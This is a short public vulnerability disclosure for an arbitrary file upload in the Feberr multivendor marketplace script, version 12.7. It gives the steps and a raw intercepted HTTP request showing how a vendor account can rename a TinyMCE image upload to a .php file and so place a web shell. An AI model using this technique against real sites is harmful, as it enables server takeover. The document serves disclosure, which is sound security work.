Feberr version 12.7 suffers from a remote shell upload vulnerability.
1e6ac2a7255ff92cbf7fabd5b44df251
# Exploit Title: Feberr - Multivendor Digital Products Marketplace arbitrary file upload
# Version 12.7
# Google Dork: N/A
# Date: 24/01/2022
# Exploit Author: Sohel Yousef - [email protected]
# Software Link: https://www.codester.com/items/14224/feberr-multivendor-digital-products-marketplace
# Software link 2 :https://www.codecanor.com/product/feberr-multivendor-digital-products-marketplace/
# Software Demo : https://overtasks.com/demo/feberr
# Category: webapps
Feberr - Multivendor Digital Products Marketplace contain arbitrary file upload
registered vendor can upload .php files in edit-item section using tinymce with use of intercept tool in burbsuite to edit the raw
details
after register as vendor on the system go and edit or add an item in the section of detailes there tinymce
direct link :
https://localhost/feberr/edit-item/
POST /demo/feberr/upload HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------429310566417994448462725662126
Content-Length: 179156
Origin: https://overtasks.com
Connection: close
Referer: https://localhost /demo/feberr/edit-item/PFRLZAmzwdWFNWnlgxUaxbLIO
Cookie: XSRF-TOKEN=eyJpdiI6InNxSGJaQjZ0UDYzamhnT2lXL09FWmc9PSIsInZhbHVlIjoiOEZCSVBnL3orczdpc2p4RE40ZmhlWCtKck1UNURET2EwWTdyeEtDVUR0Q1pMa2RLSXphSjNTbWJnRVlNS3Jld1U2d1lucWRNMDg1RVUybWdXTlMzMDAzUHcrdjNiM0IyWXRDbk01dzJJZU0zK3ZOWFlVM2JkTFRTZzdMMGhmN1UiLCJtYWMiOiIzYzU2ZTFkNThjZGQ5ZTI0ZWNiNzUzNWEyM2E4ZTk0OTZlZWYzMDc2NDAxOWU5NjZhNjkzNzQ5ZTIzMTA2NGRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNKa1RRUHgvVStWYy85MkNuVFI2RlE9PSIsInZhbHVlIjoiUk8vMWMrS0NNLzczUWdSdFBnck1sSmdzVUhkckdQYUtORlczSGFDNWRJN1MvbGx0VGFNUkVCTS9jb1I3L25PbkdBc29hODltMXVTTVlxQVlIQ1FSaWtmVWwzWkNYVUlOQUk2Q04zbmwxdzRSQXdiRTF4WVhTTy9IaWp0V2dwM0UiLCJtYWMiOiIzMDY1ODI4ODkwZTczNjJkNjZhYmE3YjJiZWFiNzA0ODNhNTdmY2RkYjFhMmFlODQ3MTg1OTAyMDFiNWM1NjMwIiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------429310566417994448462725662126
Content-Disposition: form-data; name="file"; filename="blobid1643057738041.jpg" >>>>>>>>>>>>>>> CHANGE THIS TO .php
Content-Type: image/jpeg
you will have the direct link to your uploaded file using tinymce editor